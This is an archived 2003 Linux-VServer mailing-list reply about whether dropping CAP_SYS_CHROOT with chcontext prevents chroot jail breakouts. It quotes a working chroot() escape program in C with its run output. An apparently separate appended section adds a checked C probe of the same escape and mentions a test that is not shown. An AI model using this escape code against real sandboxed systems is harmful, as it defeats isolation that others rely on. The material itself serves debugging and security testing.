On Wed, Oct 29, 2003 at 11:36:42PM -0600, Linas Vepstas wrote:
> 
> Hi,
> 
> I'm having problems testing chroot with chcontext ... it seems broken
> for me.  Maybe I'm doing something wrong.  Anyone know if the following
> should have worked? 
> 
> I assumed that taking away CAP_SYS_CHROOT would not let me 
> break out of chroot jails but it seems that I can break out 
> after all.  I'm gonna try to see if this is a kernel bug
> tomorrow ... or if I'm just entertaining false hopes... 

hmm, after --cap '!CAP_SYS_CHROOT', you should not be able
to perform chroot() at all ... and I don't see any reason
why the chroot() in your example should have worked ...

so of course you can break out of a chroot that didn't happen
but what is the point of that?

confused,
Herbert

> The way I understand it, chcontext should have set 'the cap ceiling'
> which means that children cannot inherit anything looser ...
> 
> xx:~/mnt# chcontext --secure --cap '!CAP_SYS_CHROOT' /bin/sh
> New security context is 14
> xx:~/mnt# ps ax 
>   PID TTY      STAT   TIME COMMAND
>     1 ?        S      0:12 init [2]
> 27797 pts/1    S      0:00 /bin/sh
> 27798 pts/1    R      0:00 ps ax
> xx:~/mnt# getpcaps 27797
> Capabilities for `27797': =
> cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_net_bind_service,cap_sys_ptrace,cap_sys_tty_config,cap_lease+ep
> xx:~/mnt# vi c.c
> 
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <sys/stat.h>
> #include <sys/types.h>
>
> /* Classic chroot() escape: chroot into a subdirectory without chdir()ing
>  * into it, so the cwd stays outside the new root; then walk upward with
>  * chdir("..") until the real root is reached and chroot(".") there.
>  * No return value is checked, so a refused chroot() goes unnoticed. */
> int main(void)
> {
>     char buff [100];
>     int i;
>     // chdir("/root/mnt/breakout");
>     // chroot("/root/mnt/breakout");
>
>     getcwd(buff, 100);
>     printf ("duude we are in %s\n", buff);
>
>     mkdir("bust", 0700);
>     chroot("bust");            /* new root = ./bust, cwd left unchanged */
>     getcwd(buff, 100);
>     printf ("duude we are in %s\n", buff);
>     for (i = 0; i < 10; i++) {
>         chdir("..");           /* cwd is outside the root, so ".." keeps climbing */
>         getcwd(buff, 100);
>         printf ("by bye duude we are in %s\n", buff);
>     }
>     chroot(".");               /* make the real root the root again */
>     execl("/bin/sh", "/bin/sh", NULL);
>     return 1;                  /* only reached if execl() failed */
> }
> 
> xx:~/mnt# cc -static c.c
> xx:~/mnt# ./a.out
> duude we are in /root/mnt
> duude we are in /root/mnt
> by bye duude we are in /root
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> xx:/# ^D exit
> xx:~/mnt#  mount
> [... stuff deleted ...]
> /root/tmp on /root/mnt type none (rw,bind)
> 
> xx:~/mnt#  cat /proc/version
> 
> Linux version 2.4.22ctx-17c ([EMAIL PROTECTED]) (gcc version 3.3.2
> 20030908 (Debian prerelease)) #3 SMP Fri Oct 24 22:34:38 CDT 2003
> 
> This was a standard Marcello kernel before the ctx-17c patch ... 
> I'm running on i386 arch.
> 
> 
> --linas
> 
> -- 
> pub  1024D/01045933 2001-02-01 Linas Vepstas (Labas!) <[EMAIL PROTECTED]>
> PGP Key fingerprint = 8305 2521 6000 0B5E 8984  3F54 64A9 9A82 0104 5933
> _______________________________________________
> Vserver mailing list
> [EMAIL PROTECTED]
> http://list.linux-vserver.org/mailman/listinfo/vserver
_______________________________________________
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver
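As an added example (not from either message above, and not Linux-VServer code): a return-value-checking rewrite of Linas's test. The original a.out ignores what chroot() returns, which is exactly why a refused chroot() can look like a successful escape. This version distinguishes three outcomes: chroot() refused with EPERM (no jail was entered, so there is nothing to break out of), chroot() succeeded and the chdir("..")/chroot(".") walk got back to the real root, or chroot() succeeded and the walk stayed confined. It also reads the process's effective capability mask from the CapEff line of /proc/self/status and tests bit 18, which is CAP_SYS_CHROOT in the standard Linux capability numbering. Whether the escape worked is decided by comparing the device and inode of "/" before and after the walk, not by reading getcwd(). The names try_escape, parse_capeff, read_self_capeff, has_cap and PROBE_* are this example's own, and the sample status text used to exercise the parser is constructed, not captured output.

```c
/* chroot_probe.c: a checked version of the chroot() escape test.
 * Linux only (/proc/self/status, chroot()).  Build: cc -static -o chroot_probe chroot_probe.c
 * Run as root inside the chcontext shell; needs CAP_SYS_CHROOT for chroot() to succeed. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define CAP_SYS_CHROOT_BIT 18   /* capability number in the standard Linux numbering */

enum probe_result {
    PROBE_ESCAPED = 0,     /* chroot() worked and the walk got back to the real root */
    PROBE_CHROOT_REFUSED,  /* chroot() failed with EPERM: no jail was ever entered */
    PROBE_CONFINED,        /* chroot() worked and the walk could not leave it */
    PROBE_ERROR            /* some other syscall failed; errno is set */
};

/* Bit test on a capability mask as printed (hex) in /proc/<pid>/status. */
int has_cap(unsigned long long mask, int cap)
{
    return (int)((mask >> cap) & 1ULL);
}

/* Find the "CapEff:" line in the text of /proc/self/status and parse the hex
 * mask.  Returns 0 on success, -1 if the line is missing or malformed. */
int parse_capeff(const char *status_text, unsigned long long *out)
{
    const char *line = strstr(status_text, "CapEff:");
    if (!line) return -1;
    if (line != status_text && line[-1] != '\n') return -1;   /* must start a line */
    line += strlen("CapEff:");
    while (*line == ' ' || *line == '\t') line++;
    char *end;
    errno = 0;
    unsigned long long v = strtoull(line, &end, 16);
    if (end == line || errno) return -1;
    *out = v;
    return 0;
}

/* Effective capability set of the calling process, via /proc/self/status. */
int read_self_capeff(unsigned long long *out)
{
    char buf[8192];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_capeff(buf, out);
}

/* Same sequence as the original test (chroot without chdir, climb with
 * chdir(".."), chroot(".")), but every call is checked and the outcome is
 * judged by whether "/" is the same dev/inode it was before. */
enum probe_result try_escape(void)
{
    struct stat before, after;
    if (stat("/", &before) != 0) return PROBE_ERROR;
    if (mkdir("bust", 0700) != 0 && errno != EEXIST) return PROBE_ERROR;

    if (chroot("bust") != 0)
        return errno == EPERM ? PROBE_CHROOT_REFUSED : PROBE_ERROR;

    /* cwd is still outside the new root, so ".." keeps resolving upward. */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0) return PROBE_ERROR;
    if (chroot(".") != 0) return PROBE_ERROR;
    if (stat("/", &after) != 0) return PROBE_ERROR;

    if (before.st_dev == after.st_dev && before.st_ino == after.st_ino)
        return PROBE_ESCAPED;
    return PROBE_CONFINED;
}

int main(void)
{
    unsigned long long caps;
    if (read_self_capeff(&caps) == 0)
        printf("CapEff=%016llx, CAP_SYS_CHROOT %s\n", caps,
               has_cap(caps, CAP_SYS_CHROOT_BIT) ? "present" : "absent");

    switch (try_escape()) {
    case PROBE_ESCAPED:        puts("chroot() succeeded and the walk escaped the jail"); return 1;
    case PROBE_CHROOT_REFUSED: puts("chroot() refused with EPERM: no jail was entered"); return 0;
    case PROBE_CONFINED:       puts("chroot() succeeded and the walk stayed confined"); return 0;
    default:                   perror("probe"); return 2;
    }
}
```

Run inside the chcontext --cap '!CAP_SYS_CHROOT' shell, the first chroot() should fail with EPERM and the program says so, which is Herbert's reading of the transcript. Run as root with the capability still present, plain chroot() can be left by this walk, which is the reason for taking CAP_SYS_CHROOT out of the ceiling in the first place. The mask used in the accompanying test, 0x140804ff, is the set getpcaps printed above (bits 0 to 7, 10, 19, 26 and 28) written out by the standard capability numbering; bit 18 is clear in it.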
